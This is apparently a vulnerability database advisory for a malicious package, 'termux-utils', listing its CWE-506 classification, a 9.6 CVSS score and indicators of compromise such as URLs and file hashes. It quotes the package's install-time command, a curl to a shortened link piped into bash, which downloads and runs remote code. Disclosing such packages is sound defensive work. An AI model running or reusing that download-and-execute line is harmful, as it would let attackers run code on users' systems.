VDB
GCVE-110-OSM-2026-1347
GCVE-110-OSM-2026-1347
Advisory PublishedCVSS 9.6/10
Malicious package detected. Behaviors: network activity, install-time execution.
Payload: libobjects.so
Key findings:
- Download and Execute in package.json: "curl -sL https://bit.ly/4d7AzZC | bash"
- Binary: Network IOCs Detected in libobjects.so: "https://android.googlesource.com/toolchain/llvm-project"
IOCs:
- urls: https://www.contributor-covenant.org/version/2/0/code_of_conduct.html., https://www.contributor-covenant.org, https://www.contributor-covenant.org/translations., https://bit.ly/4d7AzZC, https://android.googlesource.com/toolchain/llvm-project
- domains: www.contributor-covenant.org, bit.ly, libobjects.so, libc.so, libdl.so (+3 more)
- sha256Hashes: 652217ee2eae053ac1d88dacb23b307f8ae452af66c9d1db5d79f3a58a773302, 09f7bd7a4048341872dccf1ab5b57a7327d8e06a525960742de7b1febf513616, f59f426259fbc6dcd70eb9c37a461a67d81e90b7df342676e5f64b6d44aa2391, 6ee59425b401218bc79b68fcc084408b21c85c0d23536740816ea48c1e6744af, ca4f6417adf73633682ada1f4d65ee8807510a3efc695e325ad64c1c8206bbe5 (+16 more)
- binaryHashes: 0198af6b637126d5d80081ae5a76fa8491b11a547af2bb256e073191976d01e1
- payloadFileHash: 5ed4f8ccd02c354bfc516dcaf5d954dc192145504199e534b294dde27f19c3d9
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | termux-utils | all (affected) | — |
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.